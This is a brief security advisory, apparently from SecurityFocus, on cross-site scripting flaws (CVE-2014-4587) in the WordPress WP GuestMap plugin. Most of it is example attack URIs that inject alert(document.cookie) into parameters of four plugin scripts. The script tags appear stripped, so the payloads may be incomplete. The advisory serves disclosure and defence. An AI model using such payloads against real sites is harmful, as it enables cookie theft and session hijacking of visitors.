WordPress WP GuestMap Plugin CVE-2014-4587 Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/wp-content/plugins/wp-guestmap/guest-locator.php?zl=alert(document.cookie)&mt=alert(document.cookie)&activate=activate&dc=alert(document.cookie)&

http://www.example.com/wp-content/plugins/wp-guestmap/online-tracker.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://www.example.com/wp-content/plugins/wp-guestmap/stats-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://www.example.com/wp-content/plugins/wp-guestmap/weather-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&


 

Privacy Statement
Copyright 2010, SecurityFocus